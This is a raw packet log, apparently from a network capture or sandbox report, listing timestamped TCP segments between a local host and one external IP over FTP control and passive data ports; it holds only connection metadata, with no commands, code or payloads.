                                                                                                                                    Oct 10, 2022 06:03:47.415273905 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.415414095 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.417352915 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.442738056 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.442858934 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.443779945 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.468885899 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.469122887 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.469973087 CEST5005664723192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.498964071 CEST6472350056185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.499083042 CEST5005664723192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.499370098 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.525958061 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.526117086 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.528364897 CEST5005664723192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.554651976 CEST6472350056185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.554713011 CEST6472350056185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.554789066 CEST5005664723192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.555993080 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.556298971 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.556369066 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.579794884 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.579860926 CEST2150055185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.580070972 CEST5005521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.713901997 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.736792088 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.737164974 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.763926029 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.763959885 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.764096975 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.764292002 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.764354944 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.769892931 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.792859077 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.794783115 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.794842958 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.818097115 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.818728924 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.818903923 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.841526985 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.842735052 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.842941046 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.866054058 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.866652012 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.867042065 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.890510082 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.894751072 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.896291971 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.919975996 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.920156002 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.920428038 CEST5005864724192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.944680929 CEST6472450058185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.944931984 CEST5005864724192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.945312023 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.968365908 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.969779015 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.970747948 CEST5005864724192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.994354963 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.994488001 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.994604111 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:47.996217012 CEST6472450058185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.996354103 CEST6472450058185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:47.996484041 CEST5005864724192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.017244101 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.017296076 CEST2150057185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.017452955 CEST5005721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.142781973 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.166230917 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.166378975 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.192089081 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.192162991 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.192197084 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.192224979 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.192267895 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.192267895 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.192476034 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.215605974 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.218760967 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.219027042 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.288103104 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.289061069 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.289231062 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.312504053 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.312674999 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.312884092 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.336663008 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.337064981 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.337760925 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.360769033 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.361074924 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.363379955 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.386904001 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.390327930 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.391158104 CEST5006064725192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.416532040 CEST6472550060185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.418842077 CEST5006064725192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.419105053 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.443276882 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.443834066 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.444955111 CEST5006064725192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.468880892 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.469724894 CEST6472550060185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.469995975 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.470079899 CEST6472550060185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.470223904 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.470307112 CEST5006064725192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.494318962 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.494374990 CEST2150059185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.494868040 CEST5005921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.619112015 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.644541979 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.645862103 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.674148083 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.674192905 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.674225092 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.674361944 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.674741983 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.675117970 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.699726105 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.702869892 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.703018904 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.727000952 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.727288961 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.731153965 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.755197048 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.755451918 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.755635977 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.779871941 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.780179024 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.780844927 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.805629015 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.805862904 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.807857037 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.832914114 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.833169937 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.833642960 CEST5006264726192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.857302904 CEST6472650062185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.857448101 CEST5006264726192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.857772112 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.883349895 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.883658886 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.884507895 CEST5006264726192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.907658100 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.907835007 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.908011913 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.910196066 CEST6472650062185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.910399914 CEST6472650062185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.910491943 CEST5006264726192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:48.931987047 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.932035923 CEST2150061185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:48.932277918 CEST5006121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.059504986 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.088330984 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.088447094 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.119316101 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.119352102 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.119385004 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.119558096 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.120009899 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.148771048 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.148974895 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.149225950 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.176139116 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.176295042 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.176486969 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.204397917 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.204587936 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.204689026 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.233434916 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.233782053 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.234196901 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.260977030 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.261178017 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.267811060 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.295609951 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.295795918 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.296034098 CEST5006464728192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.319132090 CEST6472850064185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.319262981 CEST5006464728192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.319530010 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.347831964 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.348035097 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.348480940 CEST5006464728192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.371324062 CEST6472850064185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.371459007 CEST6472850064185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.371592999 CEST5006464728192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.373295069 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.373378038 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.373531103 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.400387049 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.400451899 CEST2150063185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.400558949 CEST5006321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.537755966 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.560583115 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.560832024 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.586853027 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.586947918 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.587133884 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.587352037 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.587444067 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.587445021 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.587524891 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.610296965 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.610491037 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.612807989 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.635874987 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.636132002 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.636230946 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.659084082 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.659331083 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.659562111 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.682507038 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.682744026 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.683144093 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.705873013 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.706203938 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.712784052 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.736105919 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.736310005 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.736480951 CEST5006664729192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.759412050 CEST6472950066185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.759550095 CEST5006664729192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.759854078 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.783394098 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.783509016 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.784039974 CEST5006664729192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.808387041 CEST6472950066185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.808439970 CEST6472950066185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.808600903 CEST5006664729192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.809792042 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.810034990 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.813872099 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.836241961 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.836293936 CEST2150065185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.836399078 CEST5006521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.966881990 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:49.991508007 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:49.991631985 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.022146940 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.022202015 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.022262096 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.022265911 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.022314072 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.022314072 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.024293900 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.050896883 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.050996065 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.051139116 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.076445103 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.076519966 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.076661110 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.102011919 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.102102995 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.102247953 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.127914906 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.128124952 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.128437042 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.155838013 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.155971050 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.157030106 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.183167934 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.183267117 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.183476925 CEST5006864730192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.208029032 CEST6473050068185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.208142042 CEST5006864730192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.208374977 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.233522892 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.233653069 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.234280109 CEST5006864730192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.259550095 CEST6473050068185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.259684086 CEST6473050068185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.259769917 CEST5006864730192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.261684895 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.261876106 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.278574944 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.306756973 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.306823969 CEST2150067185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.306930065 CEST5006721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.428560972 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.457751989 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.457904100 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.488667011 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.488718033 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.488750935 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.488763094 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.488826036 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.488826036 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.489145994 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.516597033 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.516798019 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.516875982 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.544970036 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.545289993 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.545557976 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.573985100 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.574232101 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.574637890 CEST5006921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:03:50.600369930 CEST2150069185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:03:50.600574970 CEST5006921192.168.2.3185.106.92.60
